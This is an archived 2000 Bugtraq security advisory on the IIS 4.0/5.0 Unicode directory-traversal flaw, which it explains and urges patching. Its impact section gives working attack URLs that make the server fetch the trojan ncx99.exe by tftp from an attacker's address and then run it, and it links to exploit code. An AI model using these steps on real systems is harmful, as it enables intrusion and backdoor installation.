From zoachien@SECURAX.ORG Tue Oct 24 10:16:02 2000 From: Zoa_Chien X-Sender: zoachien@www.securax.org To: BUGTRAQ@SECURITYFOCUS.COM Date: Tue, 24 Oct 2000 11:16:46 +0200 Subject: [BUGTRAQ] exploiting IIS unicode bug using tftp.exe and samba ===================================================================== Securax-SA-06 Security Advisory belgian.networking.security Dutch ===================================================================== Topic: Ms Windows IIS4.0 - 5.0 allows executing commands and uploading files using TFTP and SAMBA. Announced: 2000-10-23 Updated: 2000-10-24 Affects: IIS 4.0, 5.0 None affected: Apache, IIS 3.0 Obsoletes: / ===================================================================== THE ENTIRE ADVISORY HAS BEEN BASED UPON TRIAL AND ERROR RESULTS. THEREFORE WE CANNOT ENSURE YOU THE INFORMATION BELOW IS 100% CORRECT. THIS DOCUMENT IS SUBJECT TO CHANGE WITHOUT PRIOR NOTICE. PLEASE, IF YOU HAPPEN TO FIND MORE INFORMATION CONCERNING THE BUG DISCUSSED IN THIS ADVISORY, PLEASE SHARE THIS ON BUQTRAQ. THANK YOU, I. Background As mentioned in other advisories, remote users can execute any command on several IIS 4.0 and 5.0 systems by using overlong unicode representations for ../ What are these overlong unicode representations? Unicode v2.0 allows multiple encoding possibilities for each character, for instance: 2f c0 af e0 80 af f0 80 80 af f8 80 80 80 af fc 80 80 80 80 af ... are all some of the possible representations for "/". A good unicode decoder should disallow all representations with a hex value larger then the smallest possible representation to avoid problems with filtering. This is where things go wrong in IIS4.0 and 5.0, IIS first scans the given url for ../ and ..\ and for the normal unicode of these strings, if those are found, the string is rejected, if these are not found, the string will be decoded and interpreted. IIS first filtering and then decoding can be derived from the differences in error.log and acces.log when it comes to handling encoded urls. Since the filter does NOT check for the huge amount of overlong unicode representations of ../ and ..\ the filter is bypassed and the directory traversalling routine is invoked. Until now, only servers that have the /wwwroot/ dir on the same partition as the as the WINNT dir seem to be vulnerable. (Although we noticed that for some reason if an inactive /Inetpub/wwwroot/ exists on the c: drive, you will be able to run commands even if the active wwwroot is on the d: drive) Exploiting this bug is quite easy, but using pipes (>|<) always causes a 500 server error, without these quotes, we cannot use interactive standard NT executables like ftp or telnet or, by using ftp.exe < script and we cannot create files with custom contents by using echo "blah blah" > filename. Thus we are limited to viewing, deleting and copying files, not changing the contents of files or running our very own trojan. II. Problem Description Anonymous, remote ( IUSR_xxxxx ) users can view, copy, delete, md and issue other non-ACL protected commands from their browser windows. The possibilities even include uploading trojans and other hostile codes, viewing .asp files, ... III. Impact By using tftp.exe that comes with NT and win2k by connecting and downloading a trojan from a tftp daemon you can bypass these restrictions. Install < ftp://ftp.cavebear.com/karl/tftpd32.zip > and connect from your compromised to your local machine using the command " tftp.exe -i xxx.xxx.xxx.xxx GET ncx99.exe ". You van do so wiith this url: /[bin-dir]/..%c0%af../winnt/system32/tftp.exe+"-i"+xxx.xxx.xxx.xxx+GET+ncx99.exe+c:\winnt\system32\ncx99.exe then all you have to do is run the trojan with: /[bin-dir]/..%c0%af../winnt/system32/ncx99.exe You might also use the samba commands: "net share and net user" on the target and "net use" on the local machine... but this does not always seem to work. (coz. netbios is not installed?) IV. Solution This *should* get patched asap, since a lot of servers seen to be vulnerable. The possibilities on this exploit are bigger than meets the eye, and we all had our share of warnings when the msadc exploded in our faces. This vulnerability is serious, so patch this as soon as possible. V. Credits UNICODE decoding flaw posted to packetstorm forum by an unknown author. for the Samba tryout and writeup for the TFTP. VI. Source code http://www.unixandbeer.com/reggie/IIS4-5.exe http://packetstorm.securify.com/0010-exploits/iisex.c recommended reading (unicode): http://www.unicode.org/charts/PDF/ http://home.sch.bme.hu/~kisza/secure-programs/x401.html http://www.cl.cam.ac.uk/~mgk25/unicode.html